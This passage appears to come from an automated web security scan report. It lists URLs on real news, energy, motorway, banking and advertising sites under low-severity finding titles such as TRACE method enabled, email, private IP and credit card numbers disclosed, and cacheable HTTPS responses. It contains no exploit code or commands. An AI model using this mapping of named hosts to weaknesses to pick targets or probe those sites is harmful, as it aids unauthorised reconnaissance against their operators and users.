21.28. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1292041577@VideoBox

21.29. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1296147858@Top

21.30. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1324184542@VideoBox

21.31. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1325040199@Top

21.32. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1325862690@VideoBox

21.33. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1330035575@Top

21.34. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1358797100@VideoBox

21.35. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1382468384@Top

21.36. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1462887643@VideoBox

21.37. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1508417434@VideoBox

21.38. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1509693265@VideoBox

21.39. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1528770217@Top

21.40. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1606364606@Top

21.41. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1635928635@Top

21.42. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1638950036@Top

21.43. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1641201147@Top

21.44. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1653859896@Top

21.45. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1661812876@VideoBox

21.46. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1697112607@VideoBox

21.47. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1702407116@VideoBox

21.48. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1749243213@VideoBox

21.49. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1759484511@VideoBox

21.50. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1797842055@Top

21.51. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1879543831@Top

21.52. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1884277491@Top

21.53. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1908765693@VideoBox

21.54. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1958902328@VideoBox

21.55. http://answers.yahoo.com/question/index

21.56. http://assicurazione-auto.ansa.it/

21.57. http://attiva.ilsole24ore.com/pr_home.jsp

21.58. http://digg.com/submit

21.59. http://du.ilsole24ore.com/utenti/Registrazione.aspx

21.60. http://du.ilsole24ore.com/utenti/facebook_connect.aspx

21.61. http://edition.cnn.com/video/flashLive/live.html

21.62. http://eni.com/en_IT/company/corporate-communication/eni-social-media/eni-social-media.shtml

21.63. http://eni.com/en_IT/company/culture-energy/figures/figures.shtml

21.64. http://eni.com/en_IT/sustainability/news/2010-10-20-eni-global-leaders-2010.shtml

21.65. http://finanza-mercati.ilsole24ore.com/quotazioni.php

21.66. http://fls.doubleclick.net/activityi

21.67. http://googleads.g.doubleclick.net/pagead/ads

21.68. http://itunes.apple.com/it/app/id395924638

21.69. http://job24.ilsole24ore.com/news/Articoli/2011/04/bertolino-Consumer-Retention-Management-aprile-2011.php

21.70. http://mail.alice.it/

21.71. http://paginebianche.ilsole24ore.com/execute.cgi

21.72. http://paginegialle.ilsole24ore.com/pgolfe/action

21.73. http://searchcio-midmarket.techtarget.com/

21.74. http://searchcio-midmarket.techtarget.com/definition/Ohms-Law

21.75. http://searchcio-midmarket.techtarget.com/definition/expert-system

21.76. http://searchcio-midmarket.techtarget.com/resources/CIO-Midmarket-Resources

21.77. http://searchcio-midmarket.techtarget.com/tip/Remote-backup-can-ease-network-disaster-recovery2

21.78. http://searchcio-midmarket.techtarget.com/tip/VoIP-now-part-of-phishing-attacks2

21.79. http://searchcio.techtarget.com/news/2240030637/CIO-survey-IT-salaries-in-2010-and-how-they-vary-by-industry

21.80. http://technology.searchcio-midmarket.com/kw

21.81. http://webshop.elsevier.com/

21.82. http://webshop.elsevier.com/illustrationservices/

21.83. http://webshop.elsevier.com/myarticleservices/booklets/

21.84. http://webshop.elsevier.com/specialissues/

21.85. http://www.absoluteastronomy.com/ads/searchbox1.htm

21.86. http://www.absoluteastronomy.com/topics/Expert_system

21.87. http://www.absoluteastronomy.com/topics/topichome.aspx

21.88. http://www.addthis.com/bookmark.php

21.89. http://www.agip.at/at/html/folder_1209.shtml

21.90. http://www.agip.de/de/html/folder_13.shtml

21.91. http://www.agip.ro/ro/html/folder_1769.shtml

21.92. http://www.agip.si/si/html/folder_1849.shtml

21.93. http://www.altergaz.fr/

21.94. http://www.ansa.it/

21.95. http://www.ansa.it/motori/

21.96. http://www.ansa.it/web/google/googleresults.html

21.97. http://www.ansa.it/web/notizie/photostory/primopiano/2011/05/02/visualizza_new.html_874819972.html

21.98. http://www.ansa.it/web/notizie/rubriche/cronaca/2011/05/02/visualizza_new.html_875536879.html

21.99. http://www.ansa.it/web/notizie/videostory/curiosita/2009/09/27/visualizza_new.html_735528534.html

21.100. http://www.ansa.it/web/notizie/videostory/primopiano/2011/05/02/visualizza_new.html_875475343.html

21.101. http://www.ansa.it/web/static/indice_letti.html

21.102. http://www.ansa.it/web/static/indice_suggeriti.html

21.103. http://www.ansa.it/web/static/photo_newsmap.html

21.104. http://www.ansa.it/web/static/tutti_tags.html

21.105. http://www.ansa.it/web/static/video_newsmap.html

21.106. http://www.autostrade.it/

21.107. http://www.autostrade.it/assistenza-al-traffico/sicurezza.html

21.108. http://www.autostrade.it/assistenza-al-traffico/tutor.html

21.109. http://www.autostrade.it/chi-siamo/attinternaz_index.html

21.110. http://www.autostrade.it/chi-siamo/eventicultura_index.html

21.111. http://www.autostrade.it/chi-siamo/index.html

21.112. http://www.autostrade.it/chi-siamo/media_index.html

21.113. http://www.autostrade.it/chi-siamo/missione_index.html

21.114. http://www.autostrade.it/chi-siamo/profilo_index.html

21.115. http://www.autostrade.it/chi-siamo/storia_index.html

21.116. http://www.autostrade.it/chi-siamo/valori_index.html

21.117. http://www.autostrade.it/comunicati/comunicati_data.jsp

21.118. http://www.autostrade.it/comunicati/comunicato_dettaglio.jsp

21.119. http://www.autostrade.it/comunicati/index.jsp

21.120. http://www.autostrade.it/opere/avvisi-al-pubblico.html

21.121. http://www.autostrade.it/opere/impatto_viabilita.html

21.122. http://www.autostrade.it/opere/index.html

21.123. http://www.autostrade.it/opere/interventi_incorso.html

21.124. http://www.autostrade.it/opere/iter_approvativo.html

21.125. http://www.autostrade.it/opere/lavori-in-corso.html

21.126. http://www.autostrade.it/opere/piano-investimenti.html

21.127. http://www.autostrade.it/opere/piano_comunicazione.html

21.128. http://www.autostrade.it/opere/stato_avanzamento.html

21.129. http://www.autostrade.it/punto-blu/index.html

21.130. http://www.autostrade.it/sostenibilita/carta.htm

21.131. http://www.autostrade.it/sostenibilita/contatti.html

21.132. http://www.autostrade.it/sostenibilita/corporate-governance.html

21.133. http://www.autostrade.it/sostenibilita/creazione-valore-aggiunto.html

21.134. http://www.autostrade.it/sostenibilita/csr-auto.html

21.135. http://www.autostrade.it/sostenibilita/energia.html

21.136. http://www.autostrade.it/sostenibilita/index.html

21.137. http://www.autostrade.it/sostenibilita/principali-indicatori.html

21.138. http://www.autostrade.it/sostenibilita/rapporti-sostenibilita.html

21.139. http://www.autostrade.it/sostenibilita/spese-investimenti.html

21.140. http://www.autostrade.it/sostenibilita/stk_eng.html

21.141. http://www.autostrade.it/stampa/contattaci.html

21.142. http://www.autostrade.it/stampa/dossier_index.html

21.143. http://www.banchedati.ilsole24ore.com/

21.144. http://www.casa.it/vendita

21.145. http://www.computerworld.com/s/article/9214732/Semantic_Web_Tools_you_can_use

21.146. http://www.facebook.com/plugins/like.php

21.147. http://www.genialloyd.it/GlfeWeb/gl/it/home.html

21.148. http://www.ilsole24ore.com/

21.149. http://www.ilsole24ore.com/art/notizie/2011-05-02/morte-bin-laden-pakistan-afghanistan-093710.shtml

21.150. http://www.luxury24.ilsole24ore.com/

21.151. http://www.luxury24.ilsole24ore.com/images/loadingAnimation.gif

21.152. http://www.sciencedirect.com/science/journal/09574174

21.153. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp

21.154. http://www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp

21.155. http://www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp

21.156. http://www.shopping24.ilsole24ore.com/sh4/js/adddomloadevent.js

21.157. http://www.telecomitalia.it/

21.158. http://www.telepass.it/ecm/faces/public/telepass/

21.159. http://www.virgilio.it/common/errore/404.html

21.160. http://www.zanox.com/en/

21.161. http://www.zanox.com/us/

22. TRACE method is enabled

22.1. http://ad78.neodatagroup.com/

22.2. http://adlev.neodatagroup.com/

22.3. http://adv.ilsole24ore.it/

22.4. https://areaclienti187.telecomitalia.it/

22.5. http://assicurazione-auto.ansa.it/

22.6. http://attiva.ilsole24ore.com/

22.7. http://auth.rossoalice.alice.it/

22.8. http://digg.com/

22.9. http://eni.com/

22.10. http://factbook.eni.com/

22.11. http://imagesdotcom.ilsole24ore.com/

22.12. http://job24.ilsole24ore.com/

22.13. http://metrics.ilsole24ore.com/

22.14. http://modelli-listini.motori.ansa.it/

22.15. http://multicard.eni.com/

22.16. http://omniture.virgilio.it/

22.17. http://pixel.rubiconproject.com/

22.18. http://secure-it.imrworldwide.com/

22.19. http://video.ilsole24ore.com/

22.20. https://www.eni.com/

22.21. http://www.insoldoni.it/

22.22. http://www.luxury24.ilsole24ore.com/

22.23. http://www.motori24.ilsole24ore.com/

22.24. http://www.shopping24.ilsole24ore.com/

22.25. http://www.virgilio.it/

23. Directory listing

24. Email addresses disclosed

24.1. https://account.musfiber.com/forgot.php

24.2. http://attiva.ilsole24ore.com/pr_home.jsp

24.3. http://du.ilsole24ore.com/utenti/Registrazione.aspx

24.4. http://en.camera.it/javascripts/cache/Camera_ENG.04e3e95b032e2b5b8336f33011507023.js

24.5. http://expertsystem.net/

24.6. http://expertsystem.net/clienti_dettaglio.asp

24.7. http://expertsystem.net/clienti_elenco.asp

24.8. http://expertsystem.net/clienti_home.asp

24.9. http://expertsystem.net/demo_prodotti.asp

24.10. http://expertsystem.net/page.asp

24.11. http://expertsystem.net/page.asp

24.12. http://expertsystem.net/vetrinanews.asp

24.13. http://job24.ilsole24ore.com/news/Articoli/2011/04/bertolino-Consumer-Retention-Management-aprile-2011.php

24.14. http://jsdotcom.ilsole24ore.com/js2010/MobileCompatibility.js

24.15. http://mail.musfiber.com/SkinFiles/musfiber.com/Pronto-/strings.xdata

24.16. http://media.techtarget.com/rms/ux/javascript/jquery.writeCapture.js

24.17. http://media.techtarget.com/rms/ux/javascript/moScripts.js

24.18. http://media.techtarget.com/rms/ux/javascript/writeCapture.js

24.19. http://media.techtarget.com/searchCIO-Midmarket/images/homepageFloater_backgroundVertical.gif

24.20. http://multicard.eni.com/it_en

24.21. http://searchcio-midmarket.techtarget.com/definition/Ohms-Law

24.22. http://searchcio-midmarket.techtarget.com/definition/expert-system

24.23. http://searchcio-midmarket.techtarget.com/news/article/0,289142,sid183_gci1518105_mem1,00.html

24.24. http://searchcio-midmarket.techtarget.com/tip/Remote-backup-can-ease-network-disaster-recovery2

24.25. http://searchcio-midmarket.techtarget.com/tip/VoIP-now-part-of-phishing-attacks2

24.26. http://searchcio-midmarket.techtarget.com/tip/VoIP-privacy-on-the-WAN2

24.27. http://searchcio.techtarget.com/news/2240030637/CIO-survey-IT-salaries-in-2010-and-how-they-vary-by-industry

24.28. http://searchstorage.techtarget.com/digitalguide/images/buttons/button_closeThisWindow.gif

24.29. http://translate.googleapis.com/translate_a/t

24.30. http://videoplayer.nlps.com/

24.31. http://webshop.elsevier.com/framework/js/ajax/wddx.js

24.32. http://www.30percento.it/

24.33. http://www.ansa.it/

24.34. http://www.ansa.it/motori/

24.35. http://www.ansa.it/web/google/googleresults.html

24.36. http://www.ansa.it/web/js/jquery.atextsize.js

24.37. http://www.ansa.it/web/js/jquery.cookie.js

24.38. http://www.ansa.it/web/notizie/photostory/primopiano/2011/05/02/visualizza_new.html_874819972.html

24.39. http://www.ansa.it/web/notizie/rubriche/cronaca/2011/05/02/visualizza_new.html_875536879.html

24.40. http://www.ansa.it/web/notizie/videostory/curiosita/2009/09/27/visualizza_new.html_735528534.html

24.41. http://www.ansa.it/web/notizie/videostory/primopiano/2011/05/02/visualizza_new.html_875475343.html

24.42. http://www.ansa.it/web/static/indice_letti.html

24.43. http://www.ansa.it/web/static/indice_suggeriti.html

24.44. http://www.ansa.it/web/static/photo_newsmap.html

24.45. http://www.ansa.it/web/static/tutti_tags.html

24.46. http://www.ansa.it/web/static/video_newsmap.html

24.47. http://www.autostrade.it/chi-siamo/media_index.html

24.48. http://www.autostrade.it/sostenibilita/contatti.html

24.49. http://www.autostrade.it/sostenibilita/stk_eng.html

24.50. http://www.autostrade.it/stampa/contattaci.html

24.51. http://www.camera.it/javascripts/cache/Camera.94a1c77f6b66cfdcc9636f18c560a41e.js

24.52. http://www.capterra.com/

24.53. http://www.capterra.com/javascripts/controls.js

24.54. http://www.capterra.com/javascripts/dragdrop.js

24.55. http://www.elsevier.com/authored_framework/include/js/v5/menu/dynlayer-common.js

24.56. http://www.elsevier.com/authored_framework/include/js/v5/menu/dynlayer.js

24.57. http://www.elsevier.com/authored_framework/include/js/v5/menu/mouseevents.js

24.58. http://www.eni.com/en_IT/home.html

24.59. http://www.eni.com/en_IT/static/js/homepage_eni_com/jquery.colorbox-min.js

24.60. http://www.eni.com/en_IT/static/js/homepage_eni_com/jquery.pngFix.js

24.61. https://www.eni.com/en_IT/static/js/homepage_eni_com/jquery.colorbox-min.js

24.62. https://www.eni.com/en_IT/static/js/pagine_salvate/jquery.cookie.js

24.63. http://www.genialloyd.it/GlfeWeb/gl/it/home.html

24.64. http://www.luxury24.ilsole24ore.com/js/jquery.dimensions.js

24.65. http://www.luxury24.ilsole24ore.com/js/jquery.gradient.js

24.66. http://www.pcai.com/web/ai_info/expert_systems.html

24.67. http://www.sciencedirect.com/science/page/javascript/controls_mod.js

24.68. https://www.sciencedirect.com/science/page/javascript/controls_mod.js

24.69. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp

24.70. http://www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp

24.71. http://www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp

24.72. http://www.zanox.com/system/modules/com.zanox.frontend.main.templates.resources/resources/scripts/jquery.pxtoem.js

25. Private IP addresses disclosed

25.1. http://blogs.adobe.com/psirt/

25.2. http://blogs.adobe.com/psirt/category/security-bulletins-and-advisories

25.3. http://compraonline.mediaworld.it/webapp/wcs/stores/servlet/PartnerVisit

25.4. http://connect.facebook.net/it_IT/all.js

25.5. http://digg.com/submit

25.6. http://i.plug.it/iplug/js/lib/mtx/omniture/domains/tracking_mail.alice.it.js

25.7. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.8. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.9. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.10. http://www.camera.it/javascripts/cache/Camera.94a1c77f6b66cfdcc9636f18c560a41e.js

25.11. http://www.casa.it/vendita

25.12. http://www.eni.com/attachments/publications/reports/reports-2009/Eni-in-2009.pdf

25.13. http://www.facebook.com/extern/login_status.php

25.14. http://www.facebook.com/extern/login_status.php

25.15. http://www.facebook.com/extern/login_status.php

25.16. http://www.facebook.com/extern/login_status.php

25.17. http://www.facebook.com/extern/login_status.php

25.18. http://www.facebook.com/extern/login_status.php

25.19. http://www.facebook.com/extern/login_status.php

25.20. http://www.facebook.com/extern/login_status.php

25.21. http://www.facebook.com/extern/login_status.php

25.22. http://www.facebook.com/extern/login_status.php

25.23. http://www.facebook.com/extern/login_status.php

25.24. http://www.facebook.com/extern/login_status.php

25.25. http://www.facebook.com/extern/login_status.php

25.26. http://www.facebook.com/extern/login_status.php

25.27. http://www.facebook.com/extern/login_status.php

25.28. http://www.facebook.com/extern/login_status.php

25.29. http://www.facebook.com/extern/login_status.php

25.30. http://www.facebook.com/extern/login_status.php

25.31. http://www.facebook.com/plugins/like.php

25.32. http://www.facebook.com/plugins/like.php

25.33. http://www.facebook.com/plugins/like.php

25.34. http://www.facebook.com/plugins/like.php

26. Credit card numbers disclosed

26.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs

26.2. http://www.bing.com/search

26.3. http://www.eni.com/attachments/azienda/profilo-compagnia/eni_sintesi_eng.pdf

26.4. http://www.eni.com/attachments/media/press-release/2010/10/press-release-2010-third-quarter-results.pdf

26.5. http://www.eni.com/attachments/media/press-release/2011/02/press-release-2010-fourth-quarter-results.pdf

26.6. http://www.eni.com/attachments/media/press-release/2011/04/press-release-2011-first-quarter-results.pdf

26.7. http://www.eni.com/attachments/publications/reports/reports-2009/Eni-in-2009.pdf

27. Robots.txt file

27.1. http://0.r.msn.com/

27.2. http://ad-emea.doubleclick.net/adj/N3024.Ilsole24ore/B5421871.2

27.3. http://adimg.alice.it/tracks/bi/images/bi_clk.gif

27.4. http://answers.yahoo.com/question/index

27.5. http://api.bing.com/qsonhs.aspx

27.6. http://assicurazione-auto.ansa.it/

27.7. http://bs.serving-sys.com/BurstingPipe/adServer.bs

27.8. http://cdn4.eyewonder.com/cm/tr/17671-124835-21707-7

27.9. http://clients1.google.com/complete/search

27.10. http://compraonline.mediaworld.it/webapp/wcs/stores/servlet/PartnerVisit

27.11. http://digg.com/submit

27.12. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_2_7/StdBanner.js

27.13. http://edition.cnn.com/video/flashLive/live.html

27.14. http://en.camera.it/

27.15. http://factbook.eni.com/en

27.16. https://feedback.live.com/default.aspx

27.17. http://fls.doubleclick.net/activityi

27.18. http://friendfeed.com/share

27.19. http://giochi-tiscali.king.com/giochi/giochi-di-carte/uno/

27.20. http://go.microsoft.com/fwlink/

27.21. http://imagesdotcom.ilsole24ore.com/images2010/SoleOnLine5/_Immagini/Notizie/USA/2011/05/bin-laden-morte-reuters-672.jpg

27.22. http://it.yahoo.com/add

27.23. http://itunes.apple.com/it/app/id395924638

27.24. http://metrics.ilsole24ore.com/b/ss/s24onewsprod,s24oglobal/1/H.20.3/s78620203291065

27.25. http://mfr.247realmedia.com/RealMedia/ads/adstream.cap/123

27.26. http://multicard.eni.com/it_en

27.27. http://nuovo.camera.it/Camera/view/doc_viewer_full

27.28. http://omniture.virgilio.it/b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955

27.29. http://paginegialle.ilsole24ore.com/pgolfe/action

27.30. http://safebrowsing.clients.google.com/safebrowsing/downloads

27.31. http://sdc.eni.it/dcs67gfdv000000ggn52ira0x_5q6n/dcs.gif

27.32. http://search.yahoo.com/bin/search

27.33. http://searchcio.techtarget.com/news/2240030637/CIO-survey-IT-salaries-in-2010-and-how-they-vary-by-industry

27.34. http://static.ak.fbcdn.net/connect/xd_proxy.php

27.35. http://translate.googleapis.com/translate_a/t

27.36. https://ui.zanox-affiliate.de/bin/z_in_frm.dll

27.37. https://www.eni.com/public/login-en_IT.shtml

27.38. http://www.googleadservices.com/pagead/conversion/1039428624/

27.39. http://www.insoldoni.it/campagna/campagna.html

27.40. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp

27.41. http://www.yoox.com/_partners/luxury24/luxury24_210x195.html

27.42. http://www.zanox.com/us/

28. Cacheable HTTPS response

28.1. https://eprocurement.eni.it/default.asp

28.2. https://seal.verisign.com/getseal

28.3. https://webshop.elsevier.com/framework/cf/ga.cfm

28.4. https://webshop.elsevier.com/framework/empty.htm

28.5. https://webshop.elsevier.com/login.cfm

28.6. https://www.eni.com/attachments/images/highslide/graphics/zoomout.cur

28.7. https://www.eni.com/login/LoginServletOSSO

28.8. https://www.sciencedirect.com/science

28.9. https://www.webank.it/favicon.ico

28.10. https://www.webank.it/swf/xml/hp_cellette.xml

28.11. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do

28.12. https://www.webank.it/webankpub/wb/fpServizi.do

28.13. https://www.webank.it/webankpub/wb/generaIMG.do

28.14. https://www.webank.it/webankpub/wb/home.do

28.15. https://www.webank.it/webankpub/wb/jsp/hp_menu_xml.jsp

29. Multiple content types specified

30. HTML does not specify charset

30.1. http://a.tribalfusion.com/j.ad

30.2. http://ad.doubleclick.net/adi/N2886.Tribal_Fusion/B5403001.12

30.3. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1024974673/SpotLight_03/OasDefault/Autopromo_SGR_100x53/Autopromo_SGR50324.html/61646331643666333464626632633930

30.4. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/108663937/TextBox_05/OasDefault/Publiscoop_SHW_textbox_2009_3/platinum_gif549825602457102593956826371562744967959685433.html/61646331643666333464626632633930

30.5. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1086908088/SpotLight_01/OasDefault/Autopromo_SGR_100x53/Autopromo_SGR.html/61646331643666333464626632633930

30.6. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1121189356/TextBox_04/OasDefault/Autopromo_SGR_100x53/Autopromo_SGR50328.html/61646331643666333464626632633930

30.7. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1202449739/PopUp/OasDefault/Autopromo_XGR_PopUp/popup_vuoto_deabyday.html/61646331643666333464626632633930

30.8. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1276087592/Right3/OasDefault/BOX_QUI_IMPRESE_SHW_080327/box_qui_imprese56058560617150171759.html/61646331643666333464626632633930

30.9. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1294602541/TextBox_01/OasDefault/BSide_SHW_t1_110425/BSide_SHW_t5_1001206701868184685496908169278696457055170903710787133771509722047340875087759047639776398766527686677058771767741477415782247919885905.html/61646331643666333464626632633930

30.10. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1303054267/SpotLight_02/OasDefault/GruppoImmobiliare_SHP_s1_110426/Spotlight1_Spotlight.html/61646331643666333464626632633930

30.11. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1334703460/LittleBox_03/OasDefault/Publiscoop_SHW_textbox_2009_2/Prova_TextBox_1411294113141166433364410645565482074889049975504425044352584535175881261295654246849571561734217681881682.html/61646331643666333464626632633930

30.12. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/133992155/Top/OasDefault/Radiocor_SHP_tb_110502/Top_NotiziarioAsia.html/61646331643666333464626632633930

30.13. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1376074468/VideoBox_3/OasDefault/Autopromo_SGR_300x250_bottom/----VIAGGI24.html/61646331643666333464626632633930

30.14. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1550753390/TextBox_06/OasDefault/BSide_SHW_t6_110406/BSide_SHW_t5_1001206701868184685496908169278696457055170903710787133771509722047340875087759047639776398766527686677058771767741477415782247919887014.html/61646331643666333464626632633930

30.15. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/177060126/TextBox_02/OasDefault/hotel24_SHW_textbox_091008/hotel24.jpg71529.html/61646331643666333464626632633930

30.16. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

30.17. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/432046773/MaxTicker_01/OasDefault/Autopromo_SGR_990x30_VUOTO/Autopromo_SGR_990x30_VUOTO.html/61646331643666333464626632633930

30.18. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/766161316/VideoBox/OasDefault/Transition_SHP_b1_110502/8728887291.html/61646331643666333464626632633930

30.19. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/810856577/LittleBox_01/OasDefault/Publiscoop_SHW_textbox_2009/494984969849885499905090951136514195159151860522275258753058533275359353801538745698257412602566048760692.html/61646331643666333464626632633930

30.20. http://bs.serving-sys.com/BurstingPipe/adServer.bs

30.21. http://fls.doubleclick.net/activityi

30.22. http://geoisp.alice.it/settacookie.html

30.23. http://geoisp.alice.it/virgilio/local/create_alice_vlocal_city_cookie.html

30.24. http://geoisp.virgilio.it/geo.php

30.25. http://nuovo.camera.it/Camera/view/doc_viewer_full

30.26. http://techtarget-www.baynote.net/baynote/tags3/common

30.27. http://use.typekit.com/k/prb2oqp-e.css

30.28. http://videoplayer.nlps.com/

30.29. http://web.missouri.edu/jonassend/courses/mindtool/ExpertExamples.html

30.30. https://webshop.elsevier.com/framework/empty.htm

30.31. http://www.absoluteastronomy.com/ads/searchbox1.htm

30.32. http://www.autostrade.it/assistenza-al-traffico/sicurezza.html

30.33. http://www.autostrade.it/assistenza-al-traffico/tutor.html

30.34. http://www.autostrade.it/chi-siamo/attinternaz_index.html

30.35. http://www.autostrade.it/chi-siamo/eventicultura_index.html

30.36. http://www.autostrade.it/chi-siamo/index.html

30.37. http://www.autostrade.it/chi-siamo/media_index.html

30.38. http://www.autostrade.it/chi-siamo/missione_index.html

30.39. http://www.autostrade.it/chi-siamo/profilo_index.html

30.40. http://www.autostrade.it/chi-siamo/storia_index.html

30.41. http://www.autostrade.it/chi-siamo/valori_index.html

30.42. http://www.autostrade.it/favicon.ico

30.43. http://www.autostrade.it/infobox/consigli/news1.html

30.44. http://www.autostrade.it/infobox/focuson/news2.html

30.45. http://www.autostrade.it/infobox/iniziative/news1.html

30.46. http://www.autostrade.it/infobox/miglioramento/news2.html

30.47. http://www.autostrade.it/infobox/news/news17.html

30.48. http://www.autostrade.it/infobox/servizi/news1.html

30.49. http://www.autostrade.it/infobox/sicurezza/news1.html

30.50. http://www.autostrade.it/opere/avvisi-al-pubblico.html

30.51. http://www.autostrade.it/opere/impatto_viabilita.html

30.52. http://www.autostrade.it/opere/index.html

30.53. http://www.autostrade.it/opere/interventi_incorso.html

30.54. http://www.autostrade.it/opere/iter_approvativo.html

30.55. http://www.autostrade.it/opere/lavori-in-corso.html

30.56. http://www.autostrade.it/opere/piano-investimenti.html

30.57. http://www.autostrade.it/opere/piano_comunicazione.html

30.58. http://www.autostrade.it/opere/stato_avanzamento.html

30.59. http://www.autostrade.it/punto-blu/index.html

30.60. http://www.autostrade.it/sostenibilita/carta.htm

30.61. http://www.autostrade.it/sostenibilita/contatti.html

30.62. http://www.autostrade.it/sostenibilita/corporate-governance.html

30.63. http://www.autostrade.it/sostenibilita/creazione-valore-aggiunto.html

30.64. http://www.autostrade.it/sostenibilita/csr-auto.html

30.65. http://www.autostrade.it/sostenibilita/energia.html

30.66. http://www.autostrade.it/sostenibilita/index.html

30.67. http://www.autostrade.it/sostenibilita/principali-indicatori.html

30.68. http://www.autostrade.it/sostenibilita/rapporti-sostenibilita.html

30.69. http://www.autostrade.it/sostenibilita/spese-investimenti.html

30.70. http://www.autostrade.it/sostenibilita/stk_eng.html

30.71. http://www.autostrade.it/stampa/contattaci.html

30.72. http://www.autostrade.it/stampa/dossier_index.html

30.73. http://www.camera.it/Camera/view_groups/render_widget_on_ajax/1

30.74. http://www.camera.it/Camera/view_groups/render_widget_on_ajax/262

30.75. http://www.camera.it/Camera/view_groups/render_widget_on_ajax/537

30.76. http://www.elsevier.com/legacy_products/p39/939/939_01_specialissues.html

30.77. http://www.elsevier.com/legacy_products/p39/939/939_01_specialissuestab.html

30.78. http://www.eni.com/login/LoginServletOSSO

30.79. https://www.eni.com/login/LoginServletOSSO

30.80. http://www.pcai.com/favicon.ico

30.81. http://www.pcai.com/web/ai_info/web/buttons/hpcontents2.gif

30.82. http://www.pcai.com/web/ai_info/web/buttons/hphelp2.gif

30.83. http://www.pcai.com/web/ai_info/web/buttons/hphome2.gif

30.84. http://www.pcai.com/web/ai_info/web/buttons/hpnews2.gif

